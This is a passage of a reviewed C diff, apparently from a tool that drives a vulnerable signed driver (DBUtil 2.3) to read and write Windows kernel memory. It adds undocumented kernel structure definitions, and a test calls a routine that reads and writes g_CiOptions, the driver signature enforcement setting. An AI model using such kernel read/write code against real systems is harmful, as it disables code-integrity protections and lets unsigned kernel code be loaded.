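Review bot: `KDUTestDSE` ignores the result of every `KDUReadKernelVM`/`KDUWriteKernelVM` call, so if the first read fails `oldValue` is still 0 and the final write stores 0 over the target instead of restoring it. Assuming these helpers return a BOOL like the provider callbacks, bail out early: `if (!KDUReadKernelVM(Context, g_CiOptions, &oldValue, sizeof(oldValue))) return;`. The address is a literal that is valid for at most one boot of one machine, so on any other system the writes land on unrelated kernel memory; it should be passed in by the caller rather than compiled in. The local should also not carry the `g_` prefix used for globals.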
@@ -56,26 +71,30 @@ VOID KDUTest()
RtlSecureZeroMemory(&Buffer, sizeof(Buffer));
- Context = KDUProviderCreate(14, FALSE, 7601, KDU_SHELLCODE_V1, ActionTypeMapDriver);
+ Context = KDUProviderCreate(16, FALSE, 7601, KDU_SHELLCODE_V1, ActionTypeMapDriver);
if (Context) {
- /*ULONG64 dummy = 0;
+ KDUTestDSE(Context);
- KDUReadKernelVM(Context,
+ //ULONG64 dummy = 0;
+
+ /*KDUReadKernelVM(Context,
0xfffff80afbbe6d18,
&dummy,
sizeof(dummy));*/
if (supQueryObjectFromHandle(Context->DeviceHandle, &objectAddress)) {
- Context->Provider->Callbacks.ReadPhysicalMemory(
+ /* Context->Provider->Callbacks.ReadPhysicalMemory(
Context->DeviceHandle,
0x1000,
&Buffer,
0x1000);
-
+ */
value = 0x1234567890ABCDEF;
+ //objectAddress = 0xfffff80710636d18;
+
FILE_OBJECT fileObject;
RtlSecureZeroMemory(&fileObject, sizeof(FILE_OBJECT));
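Review bot: `KDUProviderCreate(16, ...)` hard-codes the provider id that this commit defines as `KDU_PROVIDER_DBUTIL23` in kduprov.h; use the name, `Context = KDUProviderCreate(KDU_PROVIDER_DBUTIL23, FALSE, 7601, KDU_SHELLCODE_V1, ActionTypeMapDriver);`, so the test keeps pointing at the same driver if the ids are renumbered. The same goes for `7601`, which ntbuilds.h now names `NT_WIN7_SP1`. The commented-out `ReadPhysicalMemory` call and the stray `//objectAddress = ...` line are better deleted than kept as dead code. KDUTest continues outside this hunk.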
@@ -83,7 +102,7 @@ VOID KDUTest()
KDUReadKernelVM(Context,
objectAddress,
&fileObject,
- sizeof(fileObject));
+ sizeof(FILE_OBJECT));
Beep(0, 0);
diff --git a/Source/Shared/ntos/ntbuilds.h b/Source/Shared/ntos/ntbuilds.h
new file mode 100644
index 0000000..b09753f
--- /dev/null
+++ b/Source/Shared/ntos/ntbuilds.h
@@ -0,0 +1,80 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2021
+*
+* TITLE: NTBUILDS.H
+*
+* VERSION: 1.00
+*
+* DATE: 01 Nov 2021
+*
+* Windows NT builds definition file.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+//
+// Defines for Major Windows NT release builds
+//
+
+// Windows 7 RTM
+#define NT_WIN7_RTM 7600
+
+// Windows 7 SP1
+#define NT_WIN7_SP1 7601
+
+// Windows 8 RTM
+#define NT_WIN8_RTM 9200
+
+// Windows 8.1
+#define NT_WIN8_BLUE 9600
+
+// Windows 10 TH1
+#define NT_WIN10_THRESHOLD1 10240
+
+// Windows 10 TH2
+#define NT_WIN10_THRESHOLD2 10586
+
+// Windows 10 RS1
+#define NT_WIN10_REDSTONE1 14393
+
+// Windows 10 RS2
+#define NT_WIN10_REDSTONE2 15063
+
+// Windows 10 RS3
+#define NT_WIN10_REDSTONE3 16299
+
+// Windows 10 RS4
+#define NT_WIN10_REDSTONE4 17134
+
+// Windows 10 RS5
+#define NT_WIN10_REDSTONE5 17763
+
+// Windows 10 19H1
+#define NT_WIN10_19H1 18362
+
+// Windows 10 19H2
+#define NT_WIN10_19H2 18363
+
+// Windows 10 20H1
+#define NT_WIN10_20H1 19041
+
+// Windows 10 20H2
+#define NT_WIN10_20H2 19042
+
+// Windows 10 21H1
+#define NT_WIN10_21H1 19043
+
+// Windows 10 21H2
+#define NT_WIN10_21H2 19044
+
+// Windows 11 21H2
+#define NT_WIN11_21H2 22000
+
+// Windows 11 Active Develepment Branch (21XX)
+#define NTX_WIN11_ADB 22494
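Review bot: The last comment has a typo, `Develepment`; it should read `// Windows 11 Active Development Branch (21XX)`. `NTX_WIN11_ADB` is pinned to a single preview build (22494), so the comment should also say that code comparing against it with equality will not match any other preview build.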
diff --git a/Source/Shared/ntos/ntos.h b/Source/Shared/ntos/ntos.h
index 59cc573..6cf1e05 100644
--- a/Source/Shared/ntos/ntos.h
+++ b/Source/Shared/ntos/ntos.h
@@ -5,9 +5,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.165
+* VERSION: 1.187
*
-* DATE: 26 Apr 2021
+* DATE: 03 Dec 2021
*
* Common header file for the ntos API functions and definitions.
*
@@ -232,6 +232,9 @@ char _RTL_CONSTANT_STRING_type_check(const void *s);
#define OBJ_DONT_REPARSE 0x00001000L
#define OBJ_VALID_ATTRIBUTES 0x00001FF2L
+#define OBJ_PROTECT_CLOSE 0x00000001L
+#define OBJ_AUDIT_OBJECT_CLOSE 0x00000004L
+
//
// Callback Object Rights
//
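Review bot: `OBJ_PROTECT_CLOSE` (0x1) and `OBJ_AUDIT_OBJECT_CLOSE` (0x4) are added directly under `OBJ_VALID_ATTRIBUTES`, whose mask 0x1FF2 excludes both bits, so they are not valid `OBJECT_ATTRIBUTES` flags even though they sit in that group. As far as I know these are handle attributes; a comment such as `// Handle attributes, not valid in OBJECT_ATTRIBUTES.Attributes` above the two defines would prevent them being OR-ed into an attributes field.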
@@ -364,7 +367,7 @@ char _RTL_CONSTANT_STRING_type_check(const void *s);
#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004
#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010
#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020
-#define THREAD_CREATE_FLAGS_SKIP_THREAD_SUSPEND 0x00000040
+#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x00000040
#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080
//
@@ -424,18 +427,6 @@ char _RTL_CONSTANT_STRING_type_check(const void *s);
MEMORY_PARTITION_MODIFY_ACCESS)
#endif
-//
-// NtCreateProcessEx specific flags.
-//
-#define PS_REQUEST_BREAKAWAY 1
-#define PS_NO_DEBUG_INHERIT 2
-#define PS_INHERIT_HANDLES 4
-#define PS_LARGE_PAGES 8
-#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
- PS_NO_DEBUG_INHERIT | \
- PS_INHERIT_HANDLES | \
- PS_LARGE_PAGES)
-
//
// Define special ByteOffset parameters for read and write operations
//
@@ -546,7 +537,7 @@ typedef struct _IO_STATUS_BLOCK {
#ifndef INTERFACE_TYPE
typedef enum _INTERFACE_TYPE {
InterfaceTypeUndefined = -1,
- Internal,
+ Internal = 0,
Isa,
Eisa,
MicroChannel,
@@ -664,6 +655,7 @@ typedef enum _KWAIT_REASON {
WrAlertByThreadId,
WrDeferredPreempt,
WrPhysicalFault,
+ WrIoRing,
MaximumWaitReason
} KWAIT_REASON;
@@ -1109,6 +1101,8 @@ typedef enum _THREADINFOCLASS {
ThreadManageWritesToExecutableMemory,
ThreadPowerThrottlingState,
ThreadWorkloadClass,
+ ThreadCreateStateChange,
+ ThreadApplyStateChange,
MaxThreadInfoClass
} THREADINFOCLASS;
@@ -1173,6 +1167,18 @@ typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
+typedef enum _PROCESS_STATE_CHANGE_TYPE {
+ ProcessStateChangeSuspend,
+ ProcessStateChangeResume,
+ ProcessStateChangeMax,
+} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;
+
+typedef enum _THREAD_STATE_CHANGE_TYPE {
+ ThreadStateChangeSuspend,
+ ThreadStateChangeResume,
+ ThreadStateChangeMax,
+} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;
+
//
// Process/Thread System and User Time
// NtQueryInformationProcess using ProcessTimes
@@ -1633,7 +1639,7 @@ typedef enum _SYSTEM_INFORMATION_CLASS {
SystemHardwareSecurityTestInterfaceResultsInformation = 166,
SystemSingleModuleInformation = 167,
SystemAllowedCpuSetsInformation = 168,
- SystemDmaProtectionInformation = 169,
+ SystemVsmProtectionInformation = 169, //ex SystemDmaProtectionInformation
SystemInterruptCpuSetsInformation = 170,
SystemSecureBootPolicyFullInformation = 171,
SystemCodeIntegrityPolicyFullInformation = 172,
@@ -1692,9 +1698,21 @@ typedef enum _SYSTEM_INFORMATION_CLASS {
SystemCodeIntegrityClearDynamicStores = 225,
SystemDifPoolTrackingInformation = 226,
SystemPoolZeroingInformation = 227,
+ SystemDpcWatchdogInformation = 228,
+ SystemDpcWatchdogInformation2 = 229,
+ SystemSupportedProcessorArchitectures2 = 230,
+ SystemSingleProcessorRelationshipInformation = 231,
+ SystemXfgCheckFailureInformation = 232,
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
+typedef struct _SYSTEM_VSM_PROTECTION_INFORMATION {
+ CHAR DmaProtectionsAvailable;
+ CHAR DmaProtectionsInUse;
+ CHAR HardwareMbecAvailable;
+ CHAR ApicVirtualizationAvailable;
+} SYSTEM_VSM_PROTECTION_INFORMATION, * PSYSTEM_VSM_PROTECTION_INFORMATION;
+
//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
union {
@@ -1727,7 +1745,10 @@ typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
ULONG MdsHardwareProtected : 1;
ULONG MbClearEnabled : 1;
ULONG MbClearReported : 1;
- ULONG Reserved : 5;
+ ULONG TsxCtrlStatus : 2;
+ ULONG TsxCtrlReported : 1;
+ ULONG TaaHardwareImmune : 1;
+ ULONG Reserved : 1;
} SpeculationControlFlags;
};
} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;
@@ -1973,6 +1994,7 @@ typedef enum _FILE_INFORMATION_CLASS {
FileLinkInformationExBypassAccessCheck,
FileStorageReserveIdInformation,
FileCaseSensitiveInformationForceAccessCheck,
+ FileKnownFolderInformation,
FileMaximumInformation
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
@@ -2512,6 +2534,16 @@ typedef struct _SECTION_IMAGE_INFORMATION {
ULONG CheckSum;
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;
+typedef struct _MI_EXTRA_IMAGE_INFORMATION {
+ ULONG SizeOfHeaders;
+ ULONG SizeOfImage;
+} MI_EXTRA_IMAGE_INFORMATION, *PMI_EXTRA_IMAGE_INFORMATION;
+
+typedef struct _MI_SECTION_IMAGE_INFORMATION {
+ SECTION_IMAGE_INFORMATION ExportedImageInformation;
+ MI_EXTRA_IMAGE_INFORMATION InternalImageInformation;
+} MI_SECTION_IMAGE_INFORMATION, *PMI_SECTION_IMAGE_INFORMATION;
+
typedef struct _SECTION_IMAGE_INFORMATION64 {
ULONGLONG TransferAddress;
ULONG ZeroBits;
@@ -2964,18 +2996,36 @@ typedef struct _OBJECT_DIRECTORY_ENTRY {
} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
typedef struct _EX_PUSH_LOCK {
- union
- {
- ULONG Locked : 1;
- ULONG Waiting : 1;
- ULONG Waking : 1;
- ULONG MultipleShared : 1;
- ULONG Shared : 28;
- ULONG Value;
+ union {
+ struct {
+ ULONG_PTR Locked : 1;
+ ULONG_PTR Waiting : 1;
+ ULONG_PTR Waking : 1;
+ ULONG_PTR MultipleShared : 1;
+ ULONG_PTR Shared : sizeof(ULONG_PTR) * 8 - 4;
+ };
+ ULONG_PTR Value;
PVOID Ptr;
};
} EX_PUSH_LOCK, *PEX_PUSH_LOCK;
+typedef struct _EX_PUSH_LOCK_AUTO_EXPAND_STATE {
+ union {
+ struct {
+ ULONG Expanded : 1;
+ ULONG Transitioning : 1;
+ ULONG Pageable : 1;
+ };
+ ULONG Value;
+ };
+} EX_PUSH_LOCK_AUTO_EXPAND_STATE, *PEX_PUSH_LOCK_AUTO_EXPAND_STATE; /* size: 0x0004 */
+
+typedef struct _EX_PUSH_LOCK_AUTO_EXPAND {
+ EX_PUSH_LOCK LocalLock;
+ EX_PUSH_LOCK_AUTO_EXPAND_STATE State;
+ ULONG Stats;
+} EX_PUSH_LOCK_AUTO_EXPAND, *PEX_PUSH_LOCK_AUTO_EXPAND; /* size: 0x0010 */
+
typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {
LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
EX_PUSH_LOCK Lock;
@@ -3477,6 +3527,61 @@ typedef struct _OBJECT_HEADER {
QUAD Body;
} OBJECT_HEADER, *POBJECT_HEADER;
+//
+// Actual object header from windows 10-11.
+//
+typedef struct _OBJECT_HEADER_X {
+ LONG_PTR PointerCount;
+ union
+ {
+ LONG_PTR HandleCount;
+ PVOID NextToFree;
+ };
+
+ EX_PUSH_LOCK Lock;
+ UCHAR TypeIndex;
+
+ union
+ {
+ UCHAR TraceFlags;
+ struct
+ {
+ UCHAR DbgRefTrace : 1;
+ UCHAR DbgTracePermanent : 1;
+ };
+ };
+
+ UCHAR InfoMask;
+
+ union
+ {
+ UCHAR Flags;
+ struct
+ {
+ UCHAR NewObject : 1;
+ UCHAR KernelObject : 1;
+ UCHAR KernelOnlyAccess : 1;
+ UCHAR ExclusiveObject : 1;
+ UCHAR PermanentObject : 1;
+ UCHAR DefaultSecurityQuota : 1;
+ UCHAR SingleHandleEntry : 1;
+ UCHAR DeletedInline : 1;
+ };
+ };
+
+ ULONG Reserved;
+
+ union
+ {
+ POBJECT_CREATE_INFORMATION ObjectCreateInfo;
+ PVOID QuotaBlockCharged;
+ };
+
+ PVOID SecurityDescriptor;
+ QUAD Body;
+
+} OBJECT_HEADER_X, * POBJECT_HEADER_X;
+
#define OBJECT_TO_OBJECT_HEADER(obj) \
CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )
@@ -3511,6 +3616,19 @@ typedef struct _DEVICE_MAP_V2 {
PEJOB ServerSilo;
} DEVICE_MAP_V2, * PDEVICE_MAP_V2;
+//Since W11 (22000)
+typedef struct _DEVICE_MAP_V3 {
+ OBJECT_DIRECTORY* DosDevicesDirectory;
+ OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
+ PEJOB ServerSilo;
+ struct _DEVICE_MAP* GlobalDeviceMap;
+ EX_FAST_REF DriveObject[26];
+ LONGLONG ReferenceCount;
+ PVOID DosDevicesDirectoryHandle;
+ ULONG DriveMap;
+ UCHAR DriveType[32];
+} DEVICE_MAP_V3, PDEVICE_MAP_V3;
+
/*
** OBJECT MANAGER END
*/
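Review bot: `} DEVICE_MAP_V3, PDEVICE_MAP_V3;` is missing the `*`, so `PDEVICE_MAP_V3` is declared as a second name for the structure instead of a pointer to it. Any code that declares a `PDEVICE_MAP_V3` gets a full structure by value, and `sizeof(PDEVICE_MAP_V3)` is the structure size. It should match `DEVICE_MAP_V2` just above: `} DEVICE_MAP_V3, * PDEVICE_MAP_V3;`.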
@@ -4339,10 +4457,477 @@ typedef struct _FILE_OBJECT {
} FILE_OBJECT;
typedef struct _FILE_OBJECT* PFILE_OBJECT;
+typedef ULONG_PTR ERESOURCE_THREAD;
+typedef ERESOURCE_THREAD* PERESOURCE_THREAD;
+
+typedef struct _OWNER_ENTRY {
+ ERESOURCE_THREAD OwnerThread;
+ union {
+ LONG OwnerCount;
+ ULONG TableSize;
+ };
+
+} OWNER_ENTRY, *POWNER_ENTRY;
+
+typedef struct _ERESOURCE {
+ LIST_ENTRY SystemResourcesList;
+ POWNER_ENTRY OwnerTable;
+ SHORT ActiveCount;
+ USHORT Flag;
+ PKSEMAPHORE SharedWaiters;
+ PKEVENT ExclusiveWaiters;
+ OWNER_ENTRY OwnerThreads[2];
+ ULONG ContentionCount;
+ USHORT NumberOfSharedWaiters;
+ USHORT NumberOfExclusiveWaiters;
+ union {
+ PVOID Address;
+ ULONG_PTR CreatorBackTraceIndex;
+ };
+
+ KSPIN_LOCK SpinLock;
+} ERESOURCE, *PERESOURCE;
+
/*
* WDM END
*/
+/*
+* MM START
+*/
+typedef ULONG MMSECTION_FLAGS2;
+
+typedef struct _MMEXTEND_INFO {
+ ULONG_PTR CommittedSize;
+ ULONG ReferenceCount;
+} MMEXTEND_INFO, * PMMEXTEND_INFO; /* size: 0x0010 */
+
+//
+// Flags definitions valid only for Windows 10.
+//
+typedef struct _MMSECTION_FLAGS {
+ struct {
+ UINT BeingDeleted : 1; /* bit position: 0 */
+ UINT BeingCreated : 1; /* bit position: 1 */
+ UINT BeingPurged : 1; /* bit position: 2 */
+ UINT NoModifiedWriting : 1; /* bit position: 3 */
+ UINT FailAllIo : 1; /* bit position: 4 */
+ UINT Image : 1; /* bit position: 5 */
+ UINT Based : 1; /* bit position: 6 */
+ UINT File : 1; /* bit position: 7 */
+ UINT AttemptingDelete : 1; /* bit position: 8 */
+ UINT PrefetchCreated : 1; /* bit position: 9 */
+ UINT PhysicalMemory : 1; /* bit position: 10 */
+ UINT ImageControlAreaOnRemovableMedia : 1; /* bit position: 11 */ //CopyOnWrite
+ UINT Reserve : 1; /* bit position: 12 */
+ UINT Commit : 1; /* bit position: 13 */
+ UINT NoChange : 1; /* bit position: 14 */
+ UINT WasPurged : 1; /* bit position: 15 */
+ UINT UserReference : 1; /* bit position: 16 */
+ UINT GlobalMemory : 1; /* bit position: 17 */
+ UINT DeleteOnClose : 1; /* bit position: 18 */
+ UINT FilePointerNull : 1; /* bit position: 19 */
+ UINT PreferredNode : 6; /* bit position: 20 */
+ UINT GlobalOnlyPerSession : 1; /* bit position: 26 */
+ UINT UserWritable : 1; /* bit position: 27 */
+ UINT SystemVaAllocated : 1; /* bit position: 28 */
+ UINT PreferredFsCompressionBoundary : 1; /* bit position: 29 */
+ UINT UsingFileExtents : 1; /* bit position: 30 */
+ UINT PageSize64K : 1; /* bit position: 31 */
+ };
+} MMSECTION_FLAGS, * PMMSECTION_FLAGS; /* size: 0x0004 */
+
+//
+// Flags definitions valid only for Windows 10.
+//
+typedef struct _SEGMENT_FLAGS {
+ union {
+ struct {
+ USHORT TotalNumberOfPtes4132 : 10; /* bit position: 0 */
+ USHORT Spare0 : 2; /* bit position: 10 */
+ USHORT LargePages : 1; /* bit position: 12 */
+ USHORT DebugSymbolsLoaded : 1; /* bit position: 13 */
+ USHORT WriteCombined : 1; /* bit position: 14 */
+ USHORT NoCache : 1; /* bit position: 15 */
+ };
+ USHORT Short0;
+ }; /* size: 0x0002 */
+ union {
+ struct {
+ UCHAR FloppyMedia : 1; /* bit position: 0 */
+ UCHAR DefaultProtectionMask : 5; /* bit position: 1 */
+ UCHAR Binary32 : 1; /* bit position: 6 */
+ UCHAR ContainsDebug : 1; /* bit position: 7 */
+ };
+ UCHAR UChar1;
+ }; /* size: 0x0001 */
+ union {
+ struct {
+ UCHAR ForceCollision : 1; /* bit position: 0 */
+ UCHAR ImageSigningType : 3; /* bit position: 1 */
+ UCHAR ImageSigningLevel : 4; /* bit position: 4 */
+ };
+ UCHAR UChar2;
+ };
+} SEGMENT_FLAGS, * PSEGMENT_FLAGS; /* size: 0x0004 */
+
+typedef struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES {
+ union {
+ ULONGLONG NumberOfPtes : 6;
+ ULONGLONG PartitionId : 10;
+ ULONGLONG Spare : 2;
+ ULONGLONG SectionOffset : 48;
+ } u1;
+} MI_SYSTEM_CACHE_VIEW_ATTRIBUTES, * PMI_SYSTEM_CACHE_VIEW_ATTRIBUTES;
+
+#define VIEW_MAP_TYPE_PROCESS 1
+#define VIEW_MAP_TYPE_SESSION 2
+#define VIEW_MAP_TYPE_SYSTEM_CACHE 3
+
+typedef struct _MI_REVERSE_VIEW_MAP {
+ struct _LIST_ENTRY ViewLinks;
+ union {
+ VOID* SystemCacheVa;
+ VOID* SessionViewVa;
+ struct _EPROCESS* VadsProcess;
+ ULONG Type : 2;
+ } u1;
+ union {
+ struct _SUBSECTION* Subsection;
+ ULONG SubsectionType : 1;
+ } u2;
+ union {
+ struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES SystemCacheAttributes;
+ ULONGLONG AllAttributes; //Since W11
+ ULONGLONG SectionOffset;
+ } u3;
+} MI_REVERSE_VIEW_MAP, * PMI_REVERSE_VIEW_MAP; /* size: 0x0028 */
+
+typedef struct _RTL_BALANCED_NODE {
+ union
+ {
+ struct _RTL_BALANCED_NODE* Children[2];
+ struct
+ {
+ struct _RTL_BALANCED_NODE* Left;
+ struct _RTL_BALANCED_NODE* Right;
+ };
+ };
+ union
+ {
+ UCHAR Red : 1;
+ UCHAR Balance : 2;
+ ULONG_PTR ParentValue;
+ };
+} RTL_BALANCED_NODE, * PRTL_BALANCED_NODE;
+
+typedef struct _SEGMENT {
+
+ struct _CONTROL_AREA* ControlArea;
+ unsigned long TotalNumberOfPtes;
+ SEGMENT_FLAGS SegmentFlags;
+ ULONG_PTR NumberOfCommittedPages;
+ ULONG_PTR SizeOfSegment;
+
+ union {
+ struct _MMEXTEND_INFO* ExtendInfo;
+ void* BasedAddress;
+ } u1;
+
+ EX_PUSH_LOCK SegmentLock;
+
+ union {
+ union {
+ ULONG_PTR ImageCommitment;
+ ULONG CreatingProcessId;
+ };
+ } u2;
+
+ union {
+ union {
+ struct _MI_SECTION_IMAGE_INFORMATION* ImageInformation;
+ void* FirstMappedVa;
+ };
+ } u3;
+
+ struct _MMPTE* PrototypePte;
+
+} SEGMENT, * PSEGMENT; /* size: 0x0048 */
+
+typedef struct _CONTROL_AREA_COMPAT {
+
+ SEGMENT* Segment;
+ LIST_ENTRY ListHead;
+ ULONG_PTR NumberOfSectionReferences;
+ ULONG_PTR NumberOfPfnReferences;
+ ULONG_PTR NumberOfMappedViews;
+ ULONG_PTR NumberOfUserReferences;
+
+ union {
+ union {
+ ULONG LongFlags;
+ MMSECTION_FLAGS Flags;
+ };
+ } u;
+
+ union {
+ union {
+ ULONG LongFlags;
+ MMSECTION_FLAGS2 Flags;
+ };
+ } u1;
+
+ EX_FAST_REF FilePointer;
+ volatile LONG ControlAreaLock;
+ ULONG ModifiedWriteCount;
+ struct _MI_CONTROL_AREA_WAIT_BLOCK* WaitList;
+
+ union
+ {
+ struct
+ {
+ union
+ {
+ ULONG NumberOfSystemCacheViews;
+ ULONG ImageRelocationStartBit;
+ };
+ union
+ {
+ volatile LONG WritableUserReferences;
+ struct // version dependent, this bitset is not valid for w11
+ {
+ unsigned long ImageRelocationSizeIn64k : 16; /* bit position: 0 */
+ unsigned long LargePage : 1; /* bit position: 16 */
+ unsigned long SystemImage : 1; /* bit position: 17 */
+ unsigned long StrongCode : 2; /* bit position: 18 */
+ unsigned long CantMove : 1; /* bit position: 20 */
+ unsigned long BitMap : 2; /* bit position: 21 */
+ unsigned long ImageActive : 1; /* bit position: 23 */
+ };
+ };
+ union
+ {
+ ULONG FlushInProgressCount;
+ ULONG NumberOfSubsections;
+ struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;
+ };
+ } e2;
+ } u2;
+
+ //
+ // Incomplete definition, tail is version dependent.
+ //
+
+} CONTROL_AREA_COMPAT, * PCONTROL_AREA_COMPAT;
+
+//
+// N.B.
+// Only valid for Win10.
+// Change between Win10 versions.
+//
+typedef struct _MMVAD_SHORT {
+ union
+ {
+ struct
+ {
+ struct _MMVAD_SHORT* NextVad;
+ void* ExtraCreateInfo;
+ };
+ struct _RTL_BALANCED_NODE VadNode;
+ };
+
+ ULONG StartingVpn;
+ ULONG EndingVpn;
+ UCHAR StartingVpnHigh;
+ UCHAR EndingVpnHigh;
+ UCHAR CommitChargeHigh;
+ UCHAR SpareNT64VadUChar;
+ LONG ReferenceCount;
+ EX_PUSH_LOCK PushLock;
+
+ ULONG LongFlags;
+ ULONG LongFlags1;
+
+ struct _MI_VAD_EVENT_BLOCK* EventList;
+
+} MMVAD_SHORT, * PMMVAD_SHORT; /* size: 0x0040 */
+
+typedef struct _MI_VAD_SEQUENTIAL_INFO {
+
+ struct {
+#if defined(_AMD64_)
+ ULONG_PTR Length : 12; /* bit position: 0 */
+ ULONG_PTR Vpn : 52; /* bit position: 12 */
+#else
+ ULONG Length : 11; /* bit position: 0 */
+ ULONG Vpn : 21; /* bit position: 11 */
+#endif
+ };
+
+} MI_VAD_SEQUENTIAL_INFO, * PMI_VAD_SEQUENTIAL_INFO;
+
+//
+// N.B.
+// Only valid for Win10.
+// Flags meanings change between Win10 versions.
+//
+typedef struct _MMVAD_FLAGS {
+ struct
+ {
+ ULONG VadType : 3; /* bit position: 0 */
+ ULONG Protection : 5; /* bit position: 3 */
+ ULONG PreferredNode : 6; /* bit position: 8 */
+ ULONG PrivateMemory : 1; /* bit position: 14 */
+ ULONG PrivateFixup : 1; /* bit position: 15 */
+ ULONG Enclave : 1; /* bit position: 16 */
+ ULONG PageSize64K : 1; /* bit position: 17 */
+ ULONG RfgControlStack : 1; /* bit position: 18 */
+ ULONG Spare : 8; /* bit position: 19 */
+ ULONG NoChange : 1; /* bit position: 27 */
+ ULONG ManySubsections : 1; /* bit position: 28 */
+ ULONG DeleteInProgress : 1; /* bit position: 29 */
+ ULONG LockContended : 1; /* bit position: 30 */
+ ULONG Lock : 1; /* bit position: 31 */
+ };
+} MMVAD_FLAGS, * PMMVAD_FLAGS; /* size: 0x0004 */
+
+//
+// N.B.
+// Only valid for Win10.
+// Flags meanings change between Win10 versions.
+//
+typedef struct _MMVAD_FLAGS1 {
+ struct
+ {
+ ULONG CommitCharge : 31; /* bit position: 0 */
+ ULONG MemCommit : 1; /* bit position: 31 */
+ };
+} MMVAD_FLAGS1, * PMMVAD_FLAGS1; /* size: 0x0004 */
+
+//
+// N.B.
+// Only valid for Win10.
+// Flags meanings change between Win10 versions.
+//
+typedef struct _MMVAD_FLAGS2 {
+ struct
+ {
+ ULONG FileOffset : 24; /* bit position: 0 */
+ ULONG Large : 1; /* bit position: 24 */
+ ULONG TrimBehind : 1; /* bit position: 25 */
+ ULONG Inherit : 1; /* bit position: 26 */
+ ULONG NoValidationNeeded : 1; /* bit position: 27 */
+ ULONG PrivateDemandZero : 1; /* bit position: 28 */
+ ULONG Spare : 3; /* bit position: 29 */
+ };
+} MMVAD_FLAGS2, * PMMVAD_FLAGS2; /* size: 0x0004 */
+
+typedef struct _MMVAD {
+
+ struct _MMVAD_SHORT Core;
+
+ union
+ {
+ union
+ {
+ ULONG LongFlags2;
+ volatile struct _MMVAD_FLAGS2 VadFlags2;
+ };
+ } u2;
+
+ struct _SUBSECTION* Subsection;
+ struct _MMPTE* FirstPrototypePte;
+ struct _MMPTE* LastContiguousPte;
+ LIST_ENTRY ViewLinks;
+ struct _EPROCESS* VadsProcess;
+
+ union
+ {
+ union
+ {
+ struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;
+ struct _MMEXTEND_INFO* ExtendedInfo;
+ };
+ } u4;
+
+ FILE_OBJECT* FileObject;
+
+} MMVAD, * PMMVAD; /* size: 0x0088 */
+
+typedef struct _MMVIEW {
+ ULONGLONG Entry;
+ union {
+ ULONGLONG Writable : 1;
+ struct _CONTROL_AREA* ControlArea;
+ };
+ LIST_ENTRY ViewLinks;
+ PVOID SessionViewVa;
+ ULONG SessionId;
+} MMVIEW, *PMMVIEW;
+
+typedef struct _MI_IMAGE_ENTRY_IN_SESSION {
+ LIST_ENTRY Link;
+ PVOID Address;
+
+ //
+ // Incomplete and incorrect.
+ //
+
+} MI_IMAGE_ENTRY_IN_SESSION, * PMI_IMAGE_ENTRY_IN_SESSION;
+
+typedef struct _SUBSECTION_COMPAT {
+
+ struct _CONTROL_AREA* ControlArea;
+ struct _MMPTE* SubsectionBase;
+ struct _SUBSECTION* NextSubsection;
+
+ //
+ // Incomplete definition.
+ //
+
+} SUBSECTION_COMPAT, * PSUBSECTION_COMPAT;
+
+//
+// This is Windows 10 only Section Object definition.
+//
+// N.B. It completely differs from anything else.
+//
+typedef struct _SECTION_COMPAT {
+
+ RTL_BALANCED_NODE SectionNode;
+ ULONG_PTR StartingVpn;
+ ULONG_PTR EndingVpn;
+
+ union {
+ union {
+ struct _CONTROL_AREA* ControlArea;
+ struct _FILE_OBJECT* FileObject;
+ struct {
+ ULONG_PTR RemoteImageFileObject : 1; /* bit position: 0 */
+ ULONG_PTR RemoteDataFileObject : 1; /* bit position: 1 */
+ };
+ };
+ } u1;
+
+ ULONG_PTR SizeOfSection;
+
+ union {
+ ULONG LongFlags;
+ MMSECTION_FLAGS Flags;
+ } u;
+
+ struct {
+ ULONG InitialPageProtection : 12; /* bit position: 0 */
+ ULONG SessionId : 19; /* bit position: 12 */
+ ULONG NoValidationNeeded : 1; /* bit position: 31 */
+ };
+
+} SECTION_COMPAT, * PSECTION_COMPAT; /* size: 0x0040 */
+
+/*
+* MM END
+*/
+
/*
** Callbacks START
*/
